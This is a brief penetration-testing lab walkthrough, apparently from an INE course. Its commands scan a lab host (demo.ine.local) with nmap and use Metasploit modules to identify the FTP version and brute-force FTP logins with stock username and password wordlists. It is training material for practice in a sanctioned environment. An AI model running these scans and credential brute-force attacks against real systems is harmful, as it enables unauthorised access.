In this lab environment, you will be provided with GUI access to a Kali machine. The target machine will be accessible at demo.ine.local.
nmap -p- -sSVC --min-rate 7000 -n -Pn demo.ine.local -vvv
search auxiliary/scanner/ftp/
use auxiliary/scanner/ftp/ftp_version
set rhosts demo.ine.local
use auxiliary/scanner/ftp/ftp_login
set rhosts demo.ine.local
set USER_FILE /usr/share/wordlists/metasploit/common_users.txt
set PASS_FILE /usr/share/wordlists/metasploit/unix_passwords.txt